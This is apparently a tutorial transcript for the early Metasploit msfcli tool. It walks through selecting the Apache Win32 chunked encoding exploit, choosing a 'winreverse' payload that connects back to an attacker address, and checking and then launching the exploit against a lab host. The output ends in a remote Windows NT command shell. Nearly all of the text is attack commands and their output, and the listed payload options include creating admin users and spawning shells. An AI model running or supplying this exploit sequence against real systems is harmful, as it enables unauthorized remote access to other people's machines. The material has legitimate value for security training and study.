1) List the available exploits and select one

hdm@slasher framework $ ./msfcli

============
= Exploits
                                                                                                                
  0x00  PoPToP Negative Read Overflow
  0x01  Apache Win32 Chunked Encoding
  0x02  Exchange 2000 MS03-46 Heap Overflow
  0x03  Frontpage fp30reg.dll Chunked Encoding
  0x04  IA WebMail 3.x Buffer Overflow
  0x05  IIS 5.0 nsiislog.dll POST Overflow
  0x06  IIS 5.0 Printer Buffer Overflow
  0x07  IIS 5.0 WebDAV ntdll.dll Overflow
  0x08  Microsoft RPC DCOM MSO3-026 NT 2K/XP
  0x09  Microsoft RPC DCOM MSO3-026 NT 4.0
  0x0a  MSSQL 2000 Resolution Overflow
  0x0b  RealServer Describe Buffer Overflow
  0x0c  Samba trans2open Overflow
  0x0d  Solaris sadmind Remote Exec
  0x0e  War-FTPD 1.65 PASS Overflow



2) Display the information for the selected exploit

hdm@slasher framework $ ./msfcli 0x01 S

    Exploit:    Name      Default          Description
    --------    ------    -------------    ------------------
    optional    SSL                        Use SSL
    required    RHOST                      The target address
    required    RPORT                      The target port
                                                                                                                
      Name: Apache Win32 Chunked Encoding
   Version: 2.0
 Target OS: win32
Privileged: Yes
                                                                                                                
Provided By:
    H D Moore <hdm [at] metasploit.com> [Artistic License]
                                                                                                                
Available Targets:
    Windows NT/2K Brute Force
    Windows 2000
    Windows NT
                                                                                                                
Available Options:
                                                                                                                
Payload Information:
    Space: 8100
    Avoid: 8 characters
                                                                                                                
Description:
    This exploits the chunked encoding bug found in Apache
    versions 1.2.x to 1.3.24. This particular module will only
    work reliably against versions 1.3.17 on up running on
    Windows 2000 or NT. This  exploit may complelely crash
    certain versions of Apache shipped with Oracle and various
    web application frameworks.
                                                                                                                
References:
    http://www.osvdb.org/displayvuln.php?osvdb_id=838
    http://lists.insecure.org/lists/bugtraq/2002/Jun/0184.html



3) Show the available payloads

hdm@slasher framework $ ./msfcli 0x01 P
                                                                                                                
Metasploit Framework Usable Payloads
====================================
                                                                                                                
  winadduser    Create admin user X with pass X
  winbind       Listen for connection and spawn a shell
  winreverse    Connect back to attacker and spawn a shell
                                                                                                                


4) Choose a payload and show the new combined option set

hdm@slasher framework $ ./msfcli 0x01 PAYLOAD=winreverse O
                                                                                                                
Exploit and Payload Options
===========================
                                                                                                                
  Exploit:    Name      Default    Description
  --------    ------    -------    ------------------
  optional    SSL                  Use SSL
  required    RHOST                The target address
  required    RPORT     80         The target port
                                                                                                                
  Payload:    Name        Default    Description
  --------    --------    -------    ------------------------------------------
  optional    EXITFUNC    seh        Exit technique: "process", "thread", "seh"
  required    LHOST                  Local address to receive connection
  required    LPORT                  Local port to receive connection
                                                                                                                


5) Some exploits and payloads include an advanced option set

hdm@slasher framework $ ./msfcli 0x01 PAYLOAD=winreverse A
                                                                                                
Exploit and Payload Advanced Options
====================================
                                                                                                                
  Payload (Msf::Payload::win32_reverse):
  --------------------------------------
                                                                                                                
  Exploit (Msf::Exploit::apache_chunked_win32):
  ---------------------------------------------

(this one does not)                                                                                             



6) List the available targets and optionally select one

hdm@slasher framework $ ./msfcli 0x01 PAYLOAD=winreverse T
                                                                                                                
Supported Exploit Targets
=========================
                                                                                                                
  0  Windows NT/2K Brute Force
  1  Windows 2000
  2  Windows NT

                                                                                             

5) Fill in options and try a vulnerability check

hdm@slasher framework $ ./msfcli 0x01 \
PAYLOAD=winreverse RHOST=192.168.1.241 RPORT=8080 \
LHOST=192.168.1.244 LPORT=5555 TARGET=2 C

[*] Vulnerable server 'Apache/1.3.22 (Win32)'



6) Launch the actual exploit :)

hdm@slasher framework $ ./msfcli 0x01 \
PAYLOAD=winreverse RHOST=192.168.1.241 RPORT=8080 \
LHOST=192.168.1.244 LPORT=5555 TARGET=2 E

[*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 348...
[*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 352...
[*] Connection from 192.168.1.241:1033...
                                                                                                                
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
                                                                                                                
c:\program files\apache group\apache>

